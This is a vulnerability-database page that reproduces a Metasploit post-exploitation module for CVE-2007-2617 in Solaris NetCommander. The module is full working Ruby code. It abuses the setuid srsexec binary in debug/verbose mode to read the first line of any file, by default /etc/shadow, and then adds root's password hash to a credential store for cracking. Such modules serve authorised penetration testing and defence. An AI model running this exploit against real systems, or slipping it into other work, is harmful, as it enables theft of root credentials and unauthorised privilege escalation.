Lucene search
K

Solaris srsexec Arbitrary File Reader

🗓️ 13 Sep 2018 18:07:50Reported by h00die, iDefenseType 
metasploit
 metasploit
🔗 www.rapid7.com👁 43 Views

Solaris srsexec Arbitrary File Reader exploits vulnerability in NetCommander 3.2.3 and 3.2.5 for reading the first line of an arbitrary file in verbose mode. It may reveal root's hash for cracking

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2007-2617
11 May 200700:00
attackerkb
Circl
CVE-2007-2617
21 Sep 201801:57
circl
CVE
CVE-2007-2617
11 May 200716:00
cve
Cvelist
CVE-2007-2617
11 May 200716:00
cvelist
EUVD
EUVD-2007-2610
7 Oct 202500:30
euvd
NVD
CVE-2007-2617
11 May 200716:19
nvd
Prion
Code injection
11 May 200716:19
prion
Tenable Nessus
Solaris 10 (sparc) : 123870-05 (deprecated)
20 May 200700:00
nessus
Tenable Nessus
Solaris 8 (sparc) : 123870-05
20 May 200700:00
nessus
Tenable Nessus
Solaris 9 (sparc) : 123870-05
20 May 200700:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Solaris::System
  include Msf::Post::Solaris::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris srsexec Arbitrary File Reader',
        'Description' => %q{
          This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.
          When srsexec is executed in debug (-d) verbose (-v) mode,
          the first line of an arbitrary file can be read due to the suid bit set.
          The most widely accepted exploitation vector is reading /etc/shadow,
          which will reveal root's hash for cracking.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # metasploit module
          'iDefense' # discovery reported anonymously to https://labs.idefense.com
        ],
        'Platform' => [ 'solaris' ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'References' => [
          ['CVE', '2007-2617'],
          ['URL', 'https://download.oracle.com/sunalerts/1000443.1.html'],
          ['URL', 'https://www.securityfocus.com/archive/1/468235'],
          ['EDB', '30021'],
          ['BID', '23915']
        ],
        'DisclosureDate' => '2007-05-07'
      )
    )
    register_options([
      OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow'])
    ])
  end

  def suid_bin_path
    '/opt/SUNWsrspx/bin/srsexec'
  end

  def check
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    # This ls is based on the guidance in the sun alerts article
    unin = cmd_exec '/usr/bin/ls /opt/SUNWsrspx/bin/UninstallNetConnect.*.sh'
    unin =~ /UninstallNetConnect\.([\d.]{11})\.sh/
    unless ::Regexp.last_match(1)
      print_error 'NetConnect uninstall not found, either not installed or too new'
      return false
    end

    version = Rex::Version.new(::Regexp.last_match(1).split('.').map(&:to_i).join('.'))
    unless version.between?(Rex::Version.new('3.2.3'), Rex::Version.new('3.2.4'))
      print_error "#{version} is not vulnerable"
      return false
    end
    print_good "#{version} is vulnerable"

    unless setuid? suid_bin_path
      vprint_error "#{suid_bin_path} is not setuid, it must have been manually patched"
      return false
    end

    true
  end

  def run
    unless check
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    flag = Rex::Text.rand_text_alpha 5
    output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}")
    vprint_good("Raw Command Output: #{output}")

    # The first line of the file is cut at 20 characters.
    # If the output is longer than 20 characters, then
    # the next line will start with the last 2 characters from the previous line,
    # followed by the next 18 characters.

    formatted_output = output.scan(/binaries file line: (.+)$/).flatten.map do |line|
      (line.length == 20) ? line[0..17] : line
    end.join

    return if formatted_output.empty?

    print_good("First line of #{datastore['FILE']}: #{formatted_output}")

    return unless datastore['FILE'] == '/etc/shadow'

    print_good("Adding root's hash to the credential database.")
    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      workspace_id: myworkspace_id,
      post_reference_name: fullname,
      username: formatted_output.split(':')[0],
      private_data: formatted_output.split(':')[1],
      private_type: :nonreplayable_hash
    }
    create_credential(credential_data)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation